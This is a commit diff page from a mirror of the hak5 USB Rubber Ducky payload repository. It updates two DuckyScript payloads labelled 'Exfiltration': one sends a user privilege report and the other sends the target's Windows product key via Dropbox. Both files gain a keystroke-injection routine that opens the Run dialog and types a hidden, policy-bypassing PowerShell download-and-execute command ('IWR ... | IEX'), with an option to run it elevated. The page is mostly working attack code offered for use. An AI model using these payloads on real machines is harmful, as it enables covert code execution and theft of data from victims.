hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updates extensions

pull/464/head
PlumpyTurkey 2024-07-12 16:45:20 +02:00
parent 52f6bdbc6f
commit 3e5ca780e6
2 changed files with 79 additions and 36 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

74
payloads/library/exfiltration/Windows-Privilege-Excalibur/payload.txt
View File

@ -3,10 +3,47 @@ REM_BLOCK DOCUMENTATION
Author: PlumpyTurkey
Description: This payload sends you a brief user privilege escalation report via Dropbox.
Target: Windows 10, 11
Version: 1.3
Version: 1.4
Category: Exfiltration
END_REM
EXTENSION RUN_HOSTED_POWERSHELL
REM_BLOCK DOCUMENTATION
Title: Run Hosted PowerShell
Author: PlumpyTurkey
Description: This extension allows you to run a hosted PowerShell script using the Windows Run dialog box.
Target: Windows 10, 11
Version: 1.1
END_REM
REM Required options:
DEFINE #RHP_SCRIPT_URL example.com
REM Advanced options:
DEFINE #RHP_DELAY 2000
DEFINE #RHP_ELEVATED_EXECUTION FALSE
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
FUNCTION RHP_RUN()
GUI r
DELAY #RHP_DELAY
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
CTRL SHIFT ENTER
DELAY #RHP_DELAY
LEFT
END_IF_DEFINED
ENTER
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
ATTACKMODE OFF
END_IF_DEFINED
END_FUNCTION
END_EXTENSION
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
@ -71,37 +108,4 @@ EXTENSION WINDOWS_ONLY
END_IF
END_EXTENSION
EXTENSION RUN_HOSTED_POWERSHELL
REM_BLOCK DOCUMENTATION
Title: Run Hosted PowerShell
Author: PlumpyTurkey
Description: This extension executes a hosted PowerShell script using the Windows Run dialog box.
Target: Windows 10, 11
Version: 1.0
END_REM
REM Required options:
DEFINE #RHP_SCRIPT_URL example.com
REM Advanced options:
DEFINE #RHP_DELAY 2000
DEFINE #RHP_ELEVATED_EXECUTION FALSE
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
GUI r
DELAY #RHP_DELAY
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
CTRL SHIFT ENTER
DELAY #RHP_DELAY
LEFT
END_IF_DEFINED
ENTER
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
ATTACKMODE OFF
END_IF_DEFINED
END_EXTENSION
RHP_RUN()

41
payloads/library/exfiltration/Windows-Product-Key-Grabber/payload.txt
View File

@ -3,10 +3,47 @@ REM_BLOCK DOCUMENTATION
Author: PlumpyTurkey
Description: This payload sends you the target PC's Windows product key via Dropbox.
Target: Windows 10, 11
Version: 1.0
Version: 1.1
Category: Exfiltration
END_REM
EXTENSION RUN_HOSTED_POWERSHELL
REM_BLOCK DOCUMENTATION
Title: Run Hosted PowerShell
Author: PlumpyTurkey
Description: This extension allows you to run a hosted PowerShell script using the Windows Run dialog box.
Target: Windows 10, 11
Version: 1.1
END_REM
REM Required options:
DEFINE #RHP_SCRIPT_URL example.com
REM Advanced options:
DEFINE #RHP_DELAY 2000
DEFINE #RHP_ELEVATED_EXECUTION FALSE
DEFINE #RHP_DISABLE_AFTER_EXECUTION FALSE
FUNCTION RHP_RUN()
GUI r
DELAY #RHP_DELAY
STRING PowerShell -W H -EX Bypass "IWR -UseB '#RHP_SCRIPT_URL' | IEX"
IF_DEFINED_TRUE #RHP_ELEVATED_EXECUTION
CTRL SHIFT ENTER
DELAY #RHP_DELAY
LEFT
END_IF_DEFINED
ENTER
IF_DEFINED_TRUE #RHP_DISABLE_AFTER_EXECUTION
ATTACKMODE OFF
END_IF_DEFINED
END_FUNCTION
END_EXTENSION
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
@ -105,3 +142,5 @@ EXTENSION RUN_HOSTED_POWERSHELL
ATTACKMODE OFF
END_IF_DEFINED
END_EXTENSION
RHP_RUN()